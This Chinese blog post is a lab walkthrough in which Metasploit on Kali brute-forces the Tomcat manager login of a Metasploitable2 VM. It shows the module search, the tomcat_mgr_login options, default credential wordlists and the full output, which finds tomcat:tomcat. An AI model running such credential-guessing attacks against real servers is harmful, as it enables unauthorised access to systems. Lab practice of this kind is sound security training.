kali-渗透攻击tomcat服务

版权声明:本文为博主原创文章,转载请注明出处。 https://blog.csdn.net/qq_17054989/article/details/79964776

本文实验攻击目标为Metasploitable2-Linux


1、打开msfconsole控制台

root@qzwhost:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
	Is the server running on host "localhost" (::1) and accepting
	TCP/IP connections on port 5432?
could not connect to server: Connection refused
	Is the server running on host "localhost" (127.0.0.1) and accepting
	TCP/IP connections on port 5432?

                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.16.30-dev                         ]
+ -- --=[ 1722 exploits - 986 auxiliary - 300 post        ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

2、搜索有效的Tomcat模块

msf > search tomcat
[!] Module database cache not built yet, using slow search


Matching Modules
================


   Name                                                         Disclosure Date  Rank       Description
   ----                                                         ---------------  ----       -----------
   auxiliary/admin/http/tomcat_administration                                    normal     Tomcat Administration Tool Default Access
   auxiliary/admin/http/tomcat_utf8_traversal                   2009-01-09       normal     Tomcat UTF-8 Directory Traversal Vulnerability
   auxiliary/admin/http/trendmicro_dlp_traversal                2009-01-09       normal     TrendMicro Data Loss Prevention 5.5 Directory Traversal
   auxiliary/dos/http/apache_commons_fileupload_dos             2014-02-06       normal     Apache Commons FileUpload and Apache Tomcat DoS
   auxiliary/dos/http/apache_tomcat_transfer_encoding           2010-07-09       normal     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   auxiliary/dos/http/hashcollision_dos                         2011-12-28       normal     Hashtable Collisions
   auxiliary/scanner/http/tomcat_enum                                            normal     Apache Tomcat User Enumeration
   auxiliary/scanner/http/tomcat_mgr_login                                       normal     Tomcat Application Manager Login Utility
   exploit/multi/http/struts_code_exec_classloader              2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_dev_mode                           2012-01-06       excellent  Apache Struts 2 Developer Mode OGNL Execution
   exploit/multi/http/tomcat_jsp_upload_bypass                  2017-10-03       excellent  Tomcat RCE via JSP Upload Bypass
   exploit/multi/http/tomcat_mgr_deploy                         2009-11-09       excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution
   exploit/multi/http/tomcat_mgr_upload                         2009-11-09       excellent  Apache Tomcat Manager Authenticated Upload Code Execution
   exploit/multi/http/zenworks_configuration_management_upload  2015-04-07       excellent  Novell ZENworks Configuration Management Arbitrary File Upload
   post/multi/gather/tomcat_gather                                               normal     Gather Tomcat Credentials
   post/windows/gather/enum_tomcat                                               normal     Windows Gather Apache Tomcat Enumeration

这里我们选择使用模块auxiliary/scanner/http/tomcat_mgr_login  

3.查看tomcat_mgr_login模块有效选项

msf auxiliary(scanner/http/tomcat_mgr_login) > show options 

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   PASSWORD                                                                                          no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target address range or CIDR identifier
   RPORT             8080                                                                            yes       The target port (TCP)
   SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                               yes       The number of concurrent threads
   USERNAME                                                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                            yes       Whether to print output for all attempts
   VHOST                                                                                             no        HTTP server virtual host


4.指定用户名和密码文件,这里使用默认路径

msf auxiliary(scanner/http/tomcat_mgr_login) > set user_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
user_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
msf auxiliary(scanner/http/tomcat_mgr_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
pass_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

5.指定要攻击的目标服务器

msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.52.132

6.设置服务器端口号为8180

msf auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180

7.设置当渗透成功时停止

msf auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true 
stop_on_success => true

8.运行渗透程序

msf auxiliary(scanner/http/tomcat_mgr_login) > exploit 

[!] No active DB -- Credential data will not be saved!
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.52.132:8180 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

从结果中可以看到找到的账号密码为tomcat,tomcat

如果本文帮助到大家,请点关注,谢谢

阅读更多
想对作者说点什么?

博主推荐

换一批

没有更多推荐了,返回首页